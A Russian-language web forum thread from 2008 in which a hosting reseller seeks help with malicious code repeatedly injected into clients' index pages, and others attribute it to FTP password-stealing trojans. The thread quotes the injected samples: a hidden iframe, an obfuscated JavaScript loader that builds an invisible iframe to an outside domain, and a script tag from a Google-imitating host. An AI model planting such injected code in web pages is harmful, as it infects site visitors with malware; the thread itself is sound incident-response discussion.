Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Войти
 
Страницы: 1 2 След.
RSS
вредоносный код в хостинг-аккаунте
 
Я - реселлер, занят хостингом. Захожу через фтп к сайтам моих клиентов, вручную вводя пароль.

Заметил, что на сайтах всех моих клиентов (только моих, у главного хостера - такой проблемы нет) откуда-то появился вот такой код:

<iframe src="http://x12345.org/google/" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>

причем этот код есть только в файлах index.html и index.php после тега <body> или в конце файла.

Касперский видит его как вредный и не рекомендует посещать сайт. Некоторые клиенты возмущаются, хотя если по ссылке перейти - попадешь на google.com.

Я даже поменял пароль на директадмин - и ничего.

Наш тех.админ написал программу, которая удаляет из файлов index.html и index.php строчку этого кода, но он все равно появляется периодически через 2-3 недели. Т.е. удаляем только симптом, а болезнь-то остается.

Подскажите, плиз, откуда его надо убить, чтоб этот код больше на моем аккаунте не появился?
 
info king, на момент отправления моего сообщения этот код не зловреден (при условии что нет других частей кода) и не имеет никакого смысла.

P.S. Поменяйте пароли на FTP
Изменено: Юрий Стахорский - 24.07.2008 10:31:43
 
Цитата
Юрий Стахорский пишет:
P.S. Поменяйте пароли на FTP
скорее всё намного тяжелее. Сервер находится под "колпаком" у злоумышленников. Может уязвимость какая нибудь в демоне, может скрипт бажный. Всё может быть.
 
если на всех сайтах сервера то скорей всего кто то имеет там root.
Скорей всего на сервере есть что то бажное.
 
Цитата
ZER0   пишет:
если на всех сайтах сервера то скорей всего кто то имеет там root.
Скорей всего на сервере есть что то бажное.
не на всех сайтах да еще и сервера. Нет. Этот код только на сайтах МОИХ клиентов (а у моего хостера, у которого я реселлер, такой проблемы нет).

Пароль на директадмин и на фтп поменял. 2 недели подождал. Не помогло, код опять появился.
 
info king, вобщем либо у вас вирус на компьютере, который ворует пароли к FTP, либо одна и та же уязвимость во всех сайтах. Ну либо конечно, повторюсь, есть вторая часть кода.
 
Работаю на хостинге, потому выскажусь.
Эта проблема началась где-то в феврале прошлого года. Клиент цепляет трояна, который ворует пароль, под этим же пользователем ломится на ФТП и дописывает код. Не помню уже подробностей, но факт в том что там целая цепочка - после того, как посетитель попадает на зараженную страницу, через этот iframe ему подгружается троян downloader котоырй за собой тянет ещё несколько троянов, и распространение продолжается. Методы борьбы стандартные - менять пароли на ФТП, использовать адектватные антивирусы (а модификаций этого трояна много, например нод32 его засекает - но полностью систему не очищает), ну и прочее.
Проблема затронула всех хостинг-провайдеров (умолчим названия, поверьте на слово), и доставляет очень много проблем с клиентами  :evil:
 
Цитата
Эта проблема началась где-то в феврале прошлого года.
setevoй_червь™, эта проблема началась гораздо раньше )
Вирус не только у него в компьютере, но и, скорее всего, у клиентов (если они тоже сохраняют пароли на FTP).
Ребята, не сохраняйте пароли на FTP (не ставьте галочки "запомнить пароль")
 
как вам уже говорили,
проверятете ваш пк со свежими
базами на вирусы и адваре,

меняете пароль на ваш фтп,
всех ваших клиентов, просите
что бы тоже самое сделали,

и ожидаете, на каком анкауте какие будет измененея,
так же если у вас будет понятна дата изменений файлов,
вы можете попросить хостинг команию,
дать вам логи на фтп,
и посмотреть с какого IP меняли вам по фтп файлы.
 
И какой толк? Меняет ведь не мега-хакер, который сидит дома на статичном IP и успевает заражать тысячи сайтов в сутки. Нас часто просят выложить логи фтп-доступа, мы-то выкладываем - но все это до одного места.
 
толк?..

как минимму будите знать,
откуда ноги растут - кто меняет файлы

p.s. 1 да и профилактика - помойму не помешает,

Цитата

проверятете ваш пк со свежими
базами на вирусы и адваре,

меняете пароль на ваш фтп,
всех ваших клиентов, просите
что бы тоже самое сделали,

p.s. 2 - какое лучше решение вы посоветуете?
 
2AlphaM AlphaMM
да может не реселлер заражён этой нечестью, а его клиенты. Это создаёт трудности к профилактическим действиям. Не каждому можно объяснить, что нужно свой ПК держать в гигиеническом состоянии и проводить профилактики.
 
cyberX,
Цитата

да может не реселлер заражён этой нечестью, а его клиенты. Это создаёт трудности к профилактическим действиям.
согласен,
но если сообщаеться
- без точной информации на всех анкаутах были такие
добавляния, сложно оценит источник,

поэтому - только менять пароли,
а потом мониторить  - какие анкауты пострадали,
( да и по фтп смотреть - под кем входили)


P.s.
Цитата

Не каждому можно объяснить, что нужно свой ПК держать в гигиеническом состоянии и проводить профилактики.

если люди на вирусы пк не проверят - все это продолжиться,
если только реселлер сам не поменяет пароли на анкауты, и люди их не будут иметь на пк, с которых они уплывали....
 
Цитата
AlphaM AlphaMM пишет:
( да и по фтп смотреть - под кем входили)
вход тут не так важен. Лучше поглядеть кто модифицирует файлы. Таким образом сужать круг клиентов которые заражены. Тяжеловато придётся. Я лично не представляю как можно бороться с этой проблемой. Хотя если зловред известен нужно дать клиентам точную инструкцию по его удалению, а вот если он не известен придётся клиентам закрывать доступ к их сайтам по ftp. А дальше думать, что можно предпринять ...
 
Цитата

Лучше поглядеть кто модифицирует файлы.
я это и имел ввиду "по фтп смотреть - под кем входили"


а насчет закрыть фтп - вообще то вариант
Изменено: AlphaM AlphaMM - 27.07.2008 20:12:29
 
Цитата
AlphaM AlphaMM пишет:
я это и имел ввиду "по фтп смотреть - под кем входили"
а насчет закрыть фтп - вообще то вариант

Для реселлера - может и вариант, а представь каково работникам хостингов (саппортом, естессно)? Например у нас 30.000 клиентов, и несмотря на рассылки, на отдельную тему на форуме, даже спустя столько времени клиенты постоянно начинают волать - вас взломали! проверьте свои серваки на вирусы (FreeBSD) и т.п.
Надоело жутко.
 
приветствую!
предчувствие меня не обмануло. Код преобразовался в ЭТО:

преобразовался во во что

<!-- o --><script>function geG(pzr,ixa){var MSo=new Date(), YNV= new Date(); YNV.setTime(MSo.getTime()+86400);
document.cookie = pzr+"="+escape(ixa)+";expires="+YNV.toGMTString();}var yTu='s1fDAz';var DyW='1',NLR='12345';
var bDM='org/';if(document.cookie.indexOf(yTu+'='+DyW) ==-1){var dlh=document.location.host;var ccc=String.fromCharCode(105,102,114,97,109,101);var jnv= 'ht'+'tp:'+'//x'+NLR+'.'+bDM+String.fromCharCode(103,111,111,103,108,101)+'/';var DaA=document.createElement(ccc);DaA.setAttribute ('src', jnv);DaA.height=0;DaA.width=3;DaA.frameBorder = 0; try{document.body.appendChild ( DaA);geG(yTu, DyW );} catch(e) {document.write ('<html><body></body></html>');  document.body.appendChild ( DaA);  geG ( yTu,DyW);} }</script><!-- c -->
 
забыл сказать: у меня ОС Виста, комп проверяю регулярно: виндовс дефендер, нортон интернет секьюрити, Spybot SD. Доступ клиентам через фтп закрыт.
 
так я не понял,
вы нашли в логах фтп,
загруженные инфицированые файлы?

может вас не через фтп залили файлы?
на сервере весит где то шелл?
 
Цитата
вы нашли в логах фтп,
загруженные инфицированые файлы?

нет. как я уже сообщал: "этот код есть только в файлах index.html и index.php после тега "body" или в конце файла".

На сегодня ситуация такова: код снова видоизменился, но стоял уже в файлах:
.../public_html/administrator/components/com_installer/mambot/i­ndex.html
.../public_html/administrator/components/com_menus/content_blog­_section/index.html
.../public_html/includes/js/calendar/lang/index.html
т.е. в тех файлах, которые в CMS Joomla должны быть пустыми.

Видоизмененный код принял вид:

<script src="http://safe.google-signature.com/webanalytics.js"></script>eG(pzr,ixa){var MSo=new Date(), YNV= new Date(); YNV.setTime(MSo.getTime()+86400);
document.cookie = pzr+"="+escape(ixa)+";expires="+YNV.toGMTString();}var yTu='s1fDAz';var DyW='1',NLR='12345';
var bDM='org/';if(document.cookie.indexOf(yTu+'='+DyW) ==-1){var dlh=document.location.host;var ccc=String.fromCharCode(105,102,114,97,109,101);var jnv= 'ht'+'tp:'+'//x'+NLR+'.'+bDM+String.fromCharCode(103,111,111,103,108,101)+'/';var DaA=document.createElement(ccc);DaA.setAttribute ('src', jnv);DaA.height=0;DaA.width=3;DaA.frameBorder = 0; try{document.body.appendChild ( DaA);geG(yTu, DyW );} catch(e) {document.write ('<html><body></body></html>');  document.body.appendChild ( DaA);  geG ( yTu,DyW);} }</script><!-- c -->


Красиво, гады, замаскировались якобы под стастистику Гугла: safe.google-signature.com/webanalytics.js

Вопрос с уязвимостями решается главным хостером. А мне остается только пожаловаться Гуглу на его же клона-пирата safe.google-signature.com, где уже стоит предупреждение, что этот сайт атакует компьютеры.
Изменено: info king - 05.08.2008 19:55:15
Страницы: 1 2 След.
Читают тему